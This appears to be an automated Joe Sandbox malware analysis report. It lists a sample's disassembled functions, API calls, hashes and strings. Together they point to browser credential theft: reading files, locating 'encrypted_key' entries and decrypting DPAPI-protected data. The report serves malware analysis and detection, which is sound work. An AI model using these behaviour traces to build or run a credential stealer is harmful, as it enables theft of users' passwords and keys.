                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 211194620-0
                                                                                                                                                                                                                                                    • Opcode ID: bd3a7af956602fe7c6df1c4612860134c2d971d66425bd02e4424b64dc609b62
                                                                                                                                                                                                                                                    • Instruction ID: 82c337f311d2267f5372d80b9cc1be68e6c9f398c62097818836d8c2486a166a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd3a7af956602fe7c6df1c4612860134c2d971d66425bd02e4424b64dc609b62
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F881A232900119EFCF01FBA4ED469DEB7B5FF14301F614061F990BB162DB60AE5A9BA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0008B3D7
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0008B529
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0008B544
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0008B596
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 211194620-0
                                                                                                                                                                                                                                                    • Opcode ID: 93377c27713344c10494467baf2127bdc2ec06e84b885829d9f7ff3d5354428d
                                                                                                                                                                                                                                                    • Instruction ID: 10c2ffae1ac1a12eb9351b31c0db27f1dd1339ac6d15a30f042ef09f7221f004
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93377c27713344c10494467baf2127bdc2ec06e84b885829d9f7ff3d5354428d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0171B032900119EFCF01FBA4ED469DEBBB5FF14301F514061F994BB162DB20AE5A9BA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034
                                                                                                                                                                                                                                                      • Part of subcall function 00091E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00096931,?), ref: 00091E37
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,?,000B7538,000B688A), ref: 0008D49F
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0008D4B2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                                                                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                                                    • API String ID: 161838763-3310892237
                                                                                                                                                                                                                                                    • Opcode ID: e0836899140569493d06ff7fddc326c9d6cb804f093d4c3d3c4da8bc47f16dbd
                                                                                                                                                                                                                                                    • Instruction ID: 2f25bfb6aeda77cd176e72154bce159cab80c1a739bb59564867c974e9f163b2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0836899140569493d06ff7fddc326c9d6cb804f093d4c3d3c4da8bc47f16dbd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5241B236900519AFCF11FBA8E9469CEB7B4BF04304F520161FD84B7263DB64AE199BE1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 0009BDC5
                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 0009BDD9
                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 0009BE26
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,0009AE6B,?,00000001,?,?,?), ref: 0009BE45
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _memmove$FileWritemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 803809635-0
                                                                                                                                                                                                                                                    • Opcode ID: 448cd1c11911de21be95e00c674f368f9db996482e5187549b183c61790f1adc
                                                                                                                                                                                                                                                    • Instruction ID: 408375fd8368af350d1ed98220313b331dec3fa44f955d1f4b680c393d81f582
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 448cd1c11911de21be95e00c674f368f9db996482e5187549b183c61790f1adc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD317071600704AFDB61CF55EA84BABB7F8FB44754F40852EE54687A01DB70F9049B50
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 000922D7
                                                                                                                                                                                                                                                      • Part of subcall function 00091D61: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00092301,?), ref: 00091D6C
                                                                                                                                                                                                                                                      • Part of subcall function 00091D61: HeapAlloc.KERNEL32(00000000), ref: 00091D73
                                                                                                                                                                                                                                                      • Part of subcall function 00091D61: wsprintfW.USER32 ref: 00091D84
                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0009237D
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0009238B
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00092392
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2224742867-0
                                                                                                                                                                                                                                                    • Opcode ID: cb76572742cc54d0269feb866d40d14be18e98a58626cbc0f53e87c93e11a848
                                                                                                                                                                                                                                                    • Instruction ID: 74db7d5bc7e8d430fdbb9e3d9b5ae543171df66e9b6b36cd33d5bb66e8147481
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb76572742cc54d0269feb866d40d14be18e98a58626cbc0f53e87c93e11a848
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC314172A01218AFDF209FA0DC889EEB7BCEF0A344F0444A6F509E6551D7349F859F52
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034
                                                                                                                                                                                                                                                      • Part of subcall function 00091E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00096931,?), ref: 00091E37
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0008CC90,?,?), ref: 000881E5
                                                                                                                                                                                                                                                      • Part of subcall function 00088048: CryptStringToBinaryA.CRYPT32(00086724,00000000,00000001,00000000,?,00000000,00000000), ref: 00088060
                                                                                                                                                                                                                                                      • Part of subcall function 00088048: LocalAlloc.KERNEL32(00000040,?,?,?,00086724,?), ref: 0008806E
                                                                                                                                                                                                                                                      • Part of subcall function 00088048: CryptStringToBinaryA.CRYPT32(00086724,00000000,00000001,00000000,?,00000000,00000000), ref: 00088084
                                                                                                                                                                                                                                                      • Part of subcall function 00088048: LocalFree.KERNEL32(?,?,?,00086724,?), ref: 00088093
                                                                                                                                                                                                                                                      • Part of subcall function 000880A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0008823B), ref: 000880C4
                                                                                                                                                                                                                                                      • Part of subcall function 000880A1: LocalAlloc.KERNEL32(00000040,0008823B,?,?,0008823B,0008CB95,?,?,?,?,?,?,?,0008CC90,?,?), ref: 000880D8
                                                                                                                                                                                                                                                      • Part of subcall function 000880A1: LocalFree.KERNEL32(0008CB95,?,?,0008823B,0008CB95,?,?,?,?,?,?,?,0008CC90,?,?), ref: 000880FD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                                                                                    • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                                                                                                    • API String ID: 2311102621-738592651
                                                                                                                                                                                                                                                    • Opcode ID: 525d6d17be897e1b7ab5bcb30ede5e6d8143d7fcec86b7182ff276bc58d86030
                                                                                                                                                                                                                                                    • Instruction ID: ae118a304597d2e6a2b33aab9d5856ab63cf3e9560af7ea739d29bf5c2880e69
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 525d6d17be897e1b7ab5bcb30ede5e6d8143d7fcec86b7182ff276bc58d86030
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3219232E4020AABDF54FA94DC459DD77B8FF81360F508665E954A7182DF30EA49CB50
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00091DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD
